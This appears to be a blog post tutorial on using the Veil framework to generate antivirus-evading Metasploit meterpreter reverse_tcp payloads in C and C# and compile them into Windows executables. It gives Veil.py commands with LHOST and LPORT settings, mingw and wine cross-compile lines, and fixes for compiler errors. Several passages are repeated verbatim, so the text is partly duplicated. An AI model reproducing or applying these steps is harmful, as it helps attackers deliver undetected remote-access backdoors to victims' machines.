As you know, veil is AV evasion framework for metasploit payload. On the 15th of every month, for the next year, at least one new payload module will be released.Yesterday they released two new payload.
Available c payloads:
VirtualAlloc Poor
VoidPointer Poor
meter_rev_tcp Excellent
meter_rev_tcp_service Excellent
root@bt:~# cd .wine/drive_c/MinGW/bin/
root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32 -o output.exe
For this purpose you have to install mingw32-w64.
Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.
root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe
I don`t test compiled exe in 64 bit, so if anyone use it, please let me know exe is working or not.
If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.
- pure windows/meterpreter/reverse_tcp stager, no shellcode
- pure windows/meterpreter/reverse_tcp windows service stager compatible with psexec, no shellcode
Compiler Error in c payloads:-
Available c payloads:
VirtualAlloc Poor
VoidPointer Poor
meter_rev_tcp Excellent
meter_rev_tcp_service Excellent
I used c/meter_rev_tcp. After setting of LHOST & LPORT ; when i try to generate it ; i got error.
sh: i686-w64-mingw32-gcc: command not found
sh: i686-w64-mingw32-gcc: command not found
Okay now we successfully generated payload file, but we get compiler error while compiling into cross-platform exe.
Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64.
Error clearly suggest that i686-w64-mingw32-gcc is not installed.The mingw-w64 project is a complete run-time environment for gcc to support binaries native to Windows 64-bit and 32-bit operating systems.In short, to compile the payload for 64 bit windows ; we have to install mingw-w64.
In case of 32 bit windows os , we can compile it,because when you setup veil environment mingw32 installed using wine.
Compile payload for 32 bit:-
root@bt:~# cd .wine/drive_c/MinGW/bin/
root@bt:~/.wine/drive_c/MinGW/bin# wine mingw32-gcc.exe /root/veil-output/source/output.c -lwsock32 -o output.exe
So our payload is compiled into exe for 32 bit windows.
Compile payload for 64 bit:-
For this purpose you have to install mingw32-w64.
Download from here & build it.If you don`t want to install it; then you can use pre-compiled version.
root@bt:/media/tools/mingw-w64-bin_i686-linux_20111031_sezero/cross_win64/bin# ./x86_64-w64-mingw32-gcc /root/veil-output/source/output.c -lwsock32 -o output.exe
I don`t test compiled exe in 64 bit, so if anyone use it, please let me know exe is working or not.
If you want to build MinGW-w64 for Win32 and Win64 using automated bash script, click here.
Compiler error in C#:-
Available c# payloads:
VirtualAlloc Poor
b64SubVirtualAlloc Normal
b64SubVirtualAlloc Normal
root@bt:~/Downloads/Veil-master# ./Veil.py -l c# -p b64SubVirtualAlloc --msfpayload windows/meterpreter/reverse_tcp -o payload --msfoptions LHOST=192.168.56.101 LPORT=443
Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'
Our source file has been generated and got following error.
error CS2007: Unrecognized command-line option: `-platform:x86'
gmcs /root/veil-output/source/payload.cs
Now our exe is generated,it`s in same source folder.
No comments:
Post a Comment